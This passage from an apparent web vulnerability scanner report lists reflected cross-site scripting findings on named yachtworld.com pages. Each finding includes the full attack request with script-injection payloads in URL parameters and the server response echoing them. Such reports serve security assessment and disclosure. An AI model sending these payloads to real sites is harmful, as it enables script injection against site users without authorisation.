latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:35:17 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "75325f3b9e';alert(1)//977a17ea687"<br>
...[SNIP]...

3.498. http://www.yachtworld.com/core/rendering/print-boat.htm [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/print-boat.htm

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51164'%3balert(1)//c9f3c0456e8 was submitted in the url parameter. This input was echoed as 51164';alert(1)//c9f3c0456e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/rendering/print-boat.htm?url=legendary51164'%3balert(1)//c9f3c0456e8&boatId=2266476&officeId=75325&isPLS=0 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:35:13 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: Could not find Listing with url: legendary51164';alert(1)//c9f3c0456e8<br>
...[SNIP]...

3.499. http://www.yachtworld.com/core/sponsored-boats/search.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/sponsored-boats/search.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8daeb"><script>alert(1)</script>fae815429d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/sponsored-boats/search.htm?8daeb"><script>alert(1)</script>fae815429d8=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:16 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/core/sponsored-boats/search.htm?8daeb"><script>alert(1)</script>fae815429d8=1">
...[SNIP]...

3.500. http://www.yachtworld.com/donnellyyachts/donnellyyachts_2.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/donnellyyachts/donnellyyachts_2.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 48d13--><script>alert(1)</script>fce375a970 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /donnellyyachts/donnellyyachts_2.cgi?company=donnellyyachts&limit=50&type=%28Power%29&new=&units=Feet&hosturl=donnellyyachts48d13--><script>alert(1)</script>fce375a970&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:52:05 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<script>alert(1)</script>fce375a970/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/donnellyyachts48d13-->
...[SNIP]...

3.501. http://www.yachtworld.com/donnellyyachts/donnellyyachts_2.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/donnellyyachts/donnellyyachts_2.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload 8aaea<script>alert(1)</script>1740f523faf was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /donnellyyachts/donnellyyachts_2.cgi?company=donnellyyachts&limit=50&type=%28Power%29&new=&units=Feet&hosturl=donnellyyachts8aaea<script>alert(1)</script>1740f523faf&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:52:02 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/donnellyyachts8aaea<script>alert(1)</script>1740f523faf/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/donnellyyachts8aaea<script>
...[SNIP]...

3.502. http://www.yachtworld.com/jarrettbay/email.cgi [office_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/jarrettbay/email.cgi

Issue detail

The value of the office_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7237a"><script>alert(1)</script>a865df0d3e4 was submitted in the office_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jarrettbay/email.cgi?url=jarrettbay&office_id=1023057237a"><script>alert(1)</script>a865df0d3e4&boat_id=2194614 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; 